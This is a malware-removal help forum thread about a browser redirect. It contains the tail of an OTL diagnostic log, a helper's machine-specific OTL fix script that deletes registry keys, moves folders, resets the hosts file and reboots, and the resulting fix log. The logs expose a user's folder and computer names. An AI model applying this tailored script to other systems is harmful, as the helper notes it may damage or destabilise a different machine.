"{CD95F661-A5C4-44F5-A6AA-ECDD91C240E3}" = WinZip 18.5
"{CE52672C-A0E9-4450-8875-88A221D5CD50}" = Windows Live ID Sign-in Assistant
"{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319
"{E9FA781F-3E80-4399-825A-AD3E11C28C77}" = MSVCRT110_amd64
"Microsoft Security Client" = Microsoft Security Essentials
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{03D562B5-C4E2-4846-A920-33178788BE00}" = Windows Live Communications Platform
"{0F929651-F516-4956-90F2-FFBD2CD5D30E}" = Photo Gallery
"{0FF9CC94-EF23-401E-BDBD-37403D1A2B38}" = Windows Live SOXE Definitions
"{196BB40D-1578-3D01-B289-BEFC77A11A1E}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319
"{22800204-9E53-45C7-B6F3-5BB0F1C1A147}" = Jing
"{24D37B30-83B4-46A7-A691-30F2FCEAE58E}" = AUSkey software 1.4.4
"{26A24AE4-039D-4CA4-87B4-2F83217017FF}" = Java 7 Update 65
"{2702B8FC-6003-4AC6-ADBC-EC65746D800A}" = Lost Via Domus
"{2AC01935-3774-4981-98C8-14E93C14372C}" = Windows Live UX Platform Language Pack
"{37476589-E48E-439E-A706-56189E2ED4C4}_is1" = Browser AdBlocker
"{45898170-E68C-4F02-AA35-C2186BF347A3}" = Movie Maker
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.11
"{52E225FC-FCB4-41F7-837B-6E37FB05BD7B}" = Adobe AIR
"{5A0EE0F0-E909-4F3B-B437-AAD9252427CB}" = Windows Live Installer
"{5E094C92-6288-4F43-AA9A-D452D0218F3F}" = Windows Live Essentials
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}" = Microsoft Games for Windows Marketplace
"{6B6923B9-8719-425B-916C-CD2908F31AAF}" = Windows Live SOXE
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}" = Microsoft Games for Windows - LIVE Redistributable
"{89C7E0A7-4D9D-4DCC-8834-A9A2B92D7EBB}" = Photo Gallery
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8E14DDC8-EA60-4E18-B3E3-1937104D5BDA}" = MSVCRT110
"{90120000-0020-0409-0000-0000000FF1CE}" = Compatibility Pack for the 2007 Office system
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{91110409-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Professional Edition 2003
"{95FC26FB-19FD-4A96-BBB1-B1062E8648F5}" = AGEIA PhysX v7.11.13
"{974C4B12-4D02-4879-85E0-61C95CC63E9E}" = Fallout 3
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.07)
"{AC7E7905-8C59-4806-A96D-30936A2B1FC5}" = Citrix Online Launcher
"{B39A6825-EA20-43EA-AB2D-A6BC0298D9A1}" = Movie Maker
"{B3BC9DB1-0B0A-48B0-B86B-EA77CAA7F800}" = Microsoft Corporation
"{C6640705-7479-4EE5-BC86-879F05F65E74}" = Google Drive
"{C6B0EE9E-2128-4448-B7AE-5E2B46E0F0E7}" = Windows Live Photo Common
"{DD7C5FC1-DCA5-487A-AF23-658B1C00243F}" = Photo Common
"{DE730F37-A198-4112-A3B6-97786F34354A}" = ECI Client v6.0
"{E0601182-5F00-4513-95D0-AFDCB7A0C658}" = calibre
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E3445598-4424-4EE2-B71C-C23325F7FB71}" = Windows Live PIMT Platform
"{EF5E9233-9C42-41C4-AD58-1522DDF89018}" = LogMeIn Hamachi
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0E58739-2B4C-498F-9B0D-FF0F2FD52B61}" = Windows Live UX Platform
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 15 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 15 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"DAEMON Tools Lite" = DAEMON Tools Lite
"Fallout New Vegas Ultimate Edition_is1" = Fallout New Vegas Ultimate Edition
"Google Chrome" = Google Chrome
"iSkysoft Video Converter Ultimate_is1" = iSkysoft Video Converter Ultimate(Build 5.4.1.0)
"LogMeIn Hamachi" = LogMeIn Hamachi
"MixPad" = MixPad
"Mozilla Firefox 28.0 (x86 en-US)" = Mozilla Firefox 28.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MTA:SA 1.3" = MTA:SA v1.3.5
"OutfoxTV" = OutfoxTV
"outlookset" = Outlook Setup Tool
"PhotoPad" = PhotoPad Image Editor
"Pixillion" = Pixillion Image Converter
"Steam" = Steam
"Steam App 211820" = Starbound
"Switch" = Switch Sound File Converter
"VLC media player" = VLC media player
"WavePad" = WavePad Sound Editor
"WinLiveSuite" = Windows Live Essentials
 
========== HKEY_USERS Uninstall List ==========
 
[HKEY_USERS\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"GoToMeeting" = GoToMeeting 6.4.4.1831
"Spotify" = Spotify
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 20/10/2014 7:11:29 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 20/10/2014 7:11:29 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
Error - 21/10/2014 3:40:31 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 21/10/2014 3:40:31 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
Error - 21/10/2014 10:14:56 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 21/10/2014 10:14:56 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
Error - 21/10/2014 11:04:41 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 21/10/2014 11:04:41 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
Error - 21/10/2014 11:11:33 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3012
Description = The performance strings in the Performance registry value is corrupted
 when process Performance extension counter provider. The BaseIndex value from the
 Performance registry is the first DWORD in the Data section, LastCounter value 
is the second DWORD in the Data section, and LastHelp value is the third DWORD in
 the Data section.
 
Error - 21/10/2014 11:11:33 PM | Computer Name = Kirra-PC | Source = Microsoft-Windows-LoadPerf | ID = 3011
Description = Unloading the performance counter strings for service WmiApRpl (WmiApRpl)
 failed. The first DWORD in the Data section contains the error code.
 
[ System Events ]
Error - 20/10/2014 10:28:01 AM | Computer Name = Kirra-PC | Source = Service Control Manager | ID = 7030
Description = The LogMeIn Hamachi Tunneling Engine service is marked as an interactive
 service.  However, the system is configured to not allow interactive services. 
 This service may not function properly.
 
Error - 21/10/2014 11:09:30 PM | Computer Name = Kirra-PC | Source = Service Control Manager | ID = 7009
Description = A timeout was reached (30000 milliseconds) while waiting for the Google
 Update Service (gupdate) service to connect.
 
Error - 21/10/2014 11:09:30 PM | Computer Name = Kirra-PC | Source = Service Control Manager | ID = 7000
Description = The Google Update Service (gupdate) service failed to start due to
 the following error:   %%1053
 
 
< End of report >
 

  • 0

Advertisements


#11
Biscuithd

Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Yup, I see it (the redirect) now.

 

Sorry for my slow reponse. My life suddenly got very busy!

 

I'll have a fix for you later this afternoon (Eastern time US) or this evening.


  • 0

#12
Biscuithd

Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Ok, let's do this.

 

51a5d669693dd-icon_OTL.png Fix with OTL

Please re-run OTL with this removal script included.



icon_exclaim.gif This fix was created for this user for use on that particular machine. icon_exclaim.gif
icon_exclaim.gif Running it on another one may cause damage and render the system unstable. icon_exclaim.gif

  • Right-click on 51a5d669693dd-icon_OTL.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Under the Custom Scans/Fixes bar in the box paste in the following:
    :Commands
    
    [SetRestorePoint]
    :OTL
    
    IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    
    IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
    
    IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    
    FF - user.js - File not found
    
    FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll File not found
    
    IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
    
    [2013/10/05 13:03:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Extensions
    
    [2014/06/05 12:10:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
    
    CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
    
    CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
    
    CHR - plugin: Error reading preferences file
    
    O4 - HKU\.DEFAULT..\RunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft..../?LinkID=122915" /build:7601 File not found
    
    O4 - HKU\S-1-5-18..\RunOnce: [SPReview] "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft..../?LinkID=122915" /build:7601 File not found
    
    O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
    
    O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
    
    O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
    
    O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
    
    O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
    
    O18:64bit: - Protocol\Handler\mso-offdap - No CLSID value found
    
    O18:64bit: - Protocol\Handler\mso-offdap11 - No CLSID value found
    
    O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
    
    O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
    
    O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
    
    O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
    
    [2014/09/30 17:07:43 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
    :Commands
    
    [emptytemp]
    
    [resethosts]
    
    [reboot]
  • Push Run Fix and wait patiently.
  • If asked to reboot, please allow it to.
  • A notepad window with a logfile will open after this run. It will be also saved in _OTL\MovedFiles directory on your main drive as (date)_(time).log.

Please include the content of this logfile in your next reply.


  • 0

#13
awesomesauce

awesomesauce

    Member

  • Topic Starter
  • Member
  • PipPip
  • 21 posts

Thank you for your fix. Here is the log:
 

All processes killed
========== COMMANDS ==========
Error: Unable to interpret <[SetRestorePoint]> in the current context!
========== OTL ==========
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
64bit-Registry key HKEY_LOCAL_MACHINE\Software\MozillaPlugins\@adobe.com/FlashPlayer\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Extensions folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} folder moved successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions folder moved successfully.
Use Chrome's Settings page to remove the default_search_provider items.
Use Chrome's Settings page to remove the default_search_provider items.
Registry value HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SPReview deleted successfully.
Registry value HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SPReview not found.
Registry value HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce\\mctadmin deleted successfully.
Registry value HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce\\mctadmin deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\msdaipp\ deleted successfully.
File Protocol\Handler\msdaipp - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\msdaipp\0x00000001\ not found.
File Protocol\Handler\msdaipp\0x00000001 - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\msdaipp\oledb\ not found.
File Protocol\Handler\msdaipp\oledb - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mso-offdap\ deleted successfully.
File Protocol\Handler\mso-offdap - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mso-offdap11\ deleted successfully.
File Protocol\Handler\mso-offdap11 - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\skype4com\ deleted successfully.
File Protocol\Handler\skype4com - No CLSID value found not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\wlpg\ deleted successfully.
File Protocol\Handler\wlpg - No CLSID value found not found.
64bit-Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\\WebCheck deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\ not found.
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\\WebCheck deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\ not found.
C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A} folder moved successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 57472 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Mitey Fresh
->Temp folder emptied: 8937853 bytes
->Temporary Internet Files folder emptied: 9720979 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 13604334 bytes
->Google Chrome cache emptied: 112231968 bytes
->Flash cache emptied: 58431 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 13379569 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 128 bytes
RecycleBin emptied: 16228013 bytes
 
Total Files Cleaned = 166.00 mb
 
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully
 
OTL by OldTimer - Version 3.2.69.0 log created on 10242014_075708
 
Files\Folders moved on Reboot...
C:\Users\Mitey Fresh\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.
File\Folder C:\Users\Mitey Fresh\AppData\Local\Temp\~DFD7914A0DC404D3A7.TMP not found!
C:\Users\Mitey Fresh\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat moved successfully.
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...

  • 0

#14
Biscuithd

Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

How is the machine working now? Did that fix the redirect?


  • 0

#15
Biscuithd

Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

72 hour bump!

 

Are you there? Is the re-direct fixed? How is the machine doing?


  • 0






Similar Topics


Also tagged with one or more of these keywords: malware removal, spyware removal, virus removal

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP